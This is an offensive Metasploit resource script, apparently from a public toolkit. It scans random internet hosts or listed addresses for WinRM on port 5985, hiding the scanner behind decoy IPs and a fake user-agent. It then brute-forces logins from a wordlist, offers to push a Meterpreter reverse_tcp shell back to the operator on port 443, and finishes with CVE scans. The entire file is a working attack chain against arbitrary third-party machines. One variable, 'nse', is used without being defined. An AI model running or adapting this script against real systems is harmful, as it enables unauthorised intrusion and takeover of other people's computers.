##
# Script: winrm_brute.rc
# Author: r00t-3xp10it <pedroubuntu10[at]gmail.com>
# GitHub: https://github.com/r00t-3xp10it/resource_files
# -
# [OPTIONS]
# setg INTERFACE wlan0 - Set local network interface in use.
# setg SAVE_DB true - Save workspace mosquito to database.xml
# setg LIMMIT 1000 - Limmit the number of random WAN hosts to search
# setg RANDOM_HOSTS true - To instruct db_nmap to random search in WAN for hosts with ports open
# setg PAYLOAD windows/meterpreter/reverse_tcp - Payload to use in exploitation function
# setg RHOSTS 203.137.119.98 154.208.147.160 205.65.133.91 - To instruct db_nmap to scan hosts for ports open.
# setg USERPASS_FILE /root/my_dicionary.txt - To instruct auxiliarys to use our own dicionary file
# -
# [SYNTAX EXAMPLES]
# msf5 > setg RANDOM_HOSTS true;resource /root/winrm_brute.rc'
# msfconsole -q -x 'setg RANDOM_HOSTS true;resource /root/winrm_brute.rc
##
  <ruby>
      run_single("workspace -a mosquito")
      help = %Q|
                                                🦟__________       
              _______🦟________________________  ___(_) _  /______🦟
           __  __  __ \\  __ \\_  ___/  __  /  / / /_  /_  __/  __ \\
         🦟_  / / / / / /_/ /(__  )/ /_/ // /_/ /_  / / /_ / /_/ /
           /_/ /_/ /_/\\____//____/ \\__, / \\__,_/ /_/  \\__/ \\____/
                                  🦟 /_/                       🦟

    Script: winrm_brute.rc
    Author: r00t-3xp10it <pedroubuntu10[at]gmail.com>
    GitHub: https://github.com/r00t-3xp10it/resource_files

      |
      print_line(help)
      Rex::sleep(1.5)


      ## Make sure we are connected to db
      unless framework.db.active
        print_error("[ERROR] Database not connected to postgresql.")
        print_warning("[execute] service postgresql start")
        run_single("exit")
        return nil
      else
        print_good("Database connected to postgresql.")
        Rex::sleep(0.5)
        local = Dir.pwd
        work_name = framework.db.workspace.name
        print_status("Working in workspace: *#{work_name}")
        Rex::sleep(1.0)
        ip_range = File.read("ip_range.txt") if File.exist?("ip_range.txt")
      end

      ## Sellect local network interface
      unless (framework.datastore['INTERFACE'] == nil or framework.datastore['INTERFACE'] == '')
        inter = "#{framework.datastore['INTERFACE']}"
      else
        inter = "wlan0"
      end

      ## Sellect the type of nmap scan to use
      if (framework.datastore['RANDOM_HOSTS'] == "true")
         if (framework.datastore['LIMMIT'] == nil or framework.datastore['LIMMIT'] == '')
           run_single("setg LIMMIT 300")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         else
           print_line("LIMMIT => #{framework.datastore['LIMMIT']}")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         end
      elsif (framework.datastore['RHOSTS'] == nil or framework.datastore['RHOSTS'] == '')
         run_single("setg RHOSTS #{ip_range}.0/24")
      elsif (framework.datastore['RHOSTS'])
         print_line("RHOSTS => #{framework.datastore['RHOSTS']}")
      end

      ## Metasploit auxiliarys brute force dicionary absoluct path
      if (framework.datastore['USERPASS_FILE'] == nil or framework.datastore['USERPASS_FILE'] == '')
         run_single("setg USERPASS_FILE #{local}/bin/wordlists/multi_services_wordlist.txt")
      else
         print_line("USERPASS_FILE => #{framework.datastore['USERPASS_FILE']}")
      end

      ## db_nmap WAN or RHOSTS or LOCAL_LAN scan settings
      # HINT: nmap will use a fake user-agent string (iPhone:Safari) while scanning.
      if (framework.datastore['RHOSTS'] == "#{ip_range}.0/24")
         run_single("db_nmap -sS -v -Pn -T4 -O -p 5985 --open --script=banner.nse,http-headers.nse,http-winrm.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" #{framework.datastore['RHOSTS']}")
      elsif (framework.datastore['RANDOM_HOSTS'] == "true")
         print_status("Nmap: search for random remote hosts with ports 5985 open")
         run_single("db_nmap -sS -vvv -Pn -T4 -iR #{framework.datastore['LIMMIT']} -p 5985 --open --script=banner.nse,http-headers.nse,http-winrm.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" -D 172.217.17.4,65.49.82.3")
      else
         run_single("db_nmap -sS -v -Pn -T4 -O -p 5985 --open --script=banner.nse,http-headers.nse,http-winrm.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" -D 172.217.17.4,65.49.82.3 #{framework.datastore['RHOSTS']}")
      end

      ## Read the database
      if File.directory?("#{local}/logs")
         run_single("spool #{local}/logs/winrm_brute.log")
      end
      print_line("")
      run_single("services")
      print_good("Sellecting target hosts from msf database.")
      xhost = framework.db.hosts.map(&:address).join(' ')
      xport = framework.db.services.map(&:port).join(' ')
      proto = framework.db.services.map(&:proto).join(' ')
      xname = framework.db.hosts.map(&:os_name).join(' ').gsub(' ',', ')
      run_single("setg RHOSTS #{xhost}")
      Rex::sleep(2.0)

         ## Make sure that exists hosts/ports (open) in database
         if xhost.nil? or xhost == '' or xhost == ' '
              print_error("[ERROR] db_nmap scan did not find any alive connections.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              run_single("workspace -d mosquito")
              return nil
         elsif xport.nil? or xport == '' or xport == ' '
              print_error("[ERROR] db_nmap did not find any 5985 open ports.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              run_single("workspace -d mosquito")
              return nil
         end

         ## Make sure that dicionary file exist (user:pass)
         check_word = "#{framework.datastore['USERPASS_FILE']}"
         unless (File.exist?(check_word))
              print_error("[ERROR] Dicionary absoluct path not found.")
              print_error("USERPASS_FILE => #{framework.datastore['USERPASS_FILE']}")
              Rex::sleep(1.0)
           word = %Q|

    [execute] setg USERPASS_FILE <absoluct-path-to-dicionary.txt>
    [example] setg USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
    'Remmenber that worldlist must be in user:pass format (one-per-line)'
    'Then we are able to run this resource script again'

           |
           print_line(word)
           print_error("Please wait, cleaning recent configurations.")
           Rex::sleep(1.0)
            run_single("unsetg all")
            run_single("workspace -d mosquito")
            return nil
         end

      ## Make sure that freevulnseach.nse exists
      Rex::sleep(2.0)
      unless (File.exist?(nse))
           print_error("[ERROR] freevulnsearch.nse/vulners.nse script(s) not found in nmap db.")
           print_error("[ERROR] Download nse script(s) and install it before running this rc file.")
           Rex::sleep(1.0)
           nof = %Q|

    How To Fix
    ----------
    Exit current session and msfconsole < exit AND exit -y >
    Then execute the follow commands in a new terminal windows:

    sudo wget https://raw.githubusercontent.com/OCSAF/freevulnsearch/master/freevulnsearch.nse
    sudo cp freevulnsearch.nse /usr/share/nmap/scripts/freevulnsearch.nse
    sudo nmap --script-updatedb

    sudo wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
    sudo cp vulners.nse /usr/share/nmap/scripts/vulners.nse
    sudo nmap --script-updatedb

           |
           print_line(nof)
           print_error("Please wait, cleaning recent configurations.")
           Rex::sleep(1.0)
           run_single("unsetg all")
           run_single("workspace -d mosquito")
           return nil
      else
           print_good("freevulnsearch.nse/vulners.nse script(s) found.")
      end


         ## Run gather/brute-force modules
         if xport =~ /5985/ or proto =~ /(winrm|wsman|wsmans)/i
            com = `ifconfig #{inter} | grep -w 'inet' | awk {'print $2'}`
              print_warning("Remote Target port: 5985 winrm found.")
              Rex::sleep(1.0)
              run_single("use auxiliary/scanner/winrm/winrm_auth_methods")
              run_single("set THREADS 10")
              print_line("")
              run_single("services -c port -S 5985 -R")
              run_single("exploit")
              Rex::sleep(1.5)
              run_single("use auxiliary/scanner/winrm/winrm_login")
              run_single("set USERPASS_FILE #{framework.datastore['USERPASS_FILE']}")
              run_single("set STOP_ON_SUCCESS true")
              run_single("set VERBOSE true")
              run_single("set THREADS 10")
              print_line("")
              run_single("services -c port -S 5985 -R")
              run_single("exploit")
              Rex::sleep(1.5)
              ## Try to exploit remote targets
              print "[ ] Exploit winrm service (y|n)? "
                 question = gets.chomp
                 if question == "y" or question == "Y" or question == "yes" or question == "YES"
                    ## User Inputs (username|password)
                    print "[+] Input Remote winrm USERNAME: "
                    user_name = gets.chomp
                    if user_name.nil? or user_name == '' or user_name == ' '
                       user_name = "Administrator"
                    end
                    print "[+] Input Remote winrm PASSWORD: "
                    user_pass = gets.chomp
                    if user_pass.nil? or user_pass == '' or user_pass == ' '
                       user_pass = "Administrator"
                    end
                    run_single("use exploit/windows/winrm/winrm_script_exec")
                    run_single("set USERNAME #{user_name}")
                    run_single("set PASSWORD #{user_pass}")
                    run_single("set VERBOSE true")
                    run_single("set THREADS 10")
                    run_single("set LHOST #{com}")
                    run_single("set LPORT 443")
                    run_single("set PAYLOAD #{framework.datastore['PAYLOAD']}")
                    print_line("")
                    run_single("services -c port -S 5985 -R")
                    run_single("exploit")
                    Rex::sleep(1.5)
                 end
         end

         ## Running freevulnsearch.nse (scan for CVE's)
         print "[+] Scan for possible CVE's? (y/n): "
            question = gets.chomp

         if question == "y" or question == "Y"
            displ = %Q|

         MMMMMMMMMMM'""""'YMMM  MM""MMMMM""MM  MM""""""""`MMMMMMMMMM
         MMMMMMMMMM' .mmm. `MM  MM  MMMMM  MM  MM  mmmmmmmMMMMMMMMMM
         MMMMMMMMMM  MMMMMooMM  MM  MMMMP  MM  MM`      MMMMMMMMMMMM 
         MMMMMMMMMM  MMMMMMMMM  MM  MMMM' .MM  MM  MMMMMMMMMMMMMMMMM 
         MMMMMMMMMM. `MMM' .MM  MM  MMP' .MMM  MM  MMMMMMMMMMMMMMMMM 
         MMMMMMMMMMM.     .dMM  MM     .dMMMM  MM        .MMMMMMd@bM 
         MMMMMMMMMMMMMMMMMMMMM  MMMMMMMMMMMMM  MMMMMMMMMMMMMMMMMMMMM
                    freevulnsearch.nse by: Mathias Gut
                         vulners.nse by: gmedian

            |
            print_line(displ)
            print_warning("Running CVE checks againts: #{framework.datastore['RHOSTS']}")
            run_single("db_nmap -sV -T4 -Pn --script=freevulnsearch.nse,vulners.nse #{framework.datastore['RHOSTS']}")
         end

      ## Save current database to local file (database.xml)
      if (framework.datastore['SAVE_DB'] == "true")
         rand = Rex::Text.rand_text_alpha(5)
         print_warning("Exporting database to: #{local}/logs/database_#{rand}.xml")
         run_single("db_export -f xml -a #{local}/logs/database_#{rand}.xml")
      end

      ## Cleaning database and unset global variables
      print_warning("Please wait, Cleaning global variables.")
      Rex::sleep(1.5)
      run_single("unsetg all")
      run_single("unset all")
      run_single("workspace -d mosquito")

      dtr = `date`
      ## Writting ['xhost(s)'] to mosquito logfile
      if File.directory?("#{local}/logs")
         print_warning("Session Logfile stored under: #{local}/logs/winrm_brute.log")
         run_single("echo \"[#{dtr}] winrm_brute: #{xhost}\" >> logs/mosquito.log")
      end
      File.delete("ip_range.txt") if File.exist?("ip_range.txt")
      run_single("back")
   </ruby>

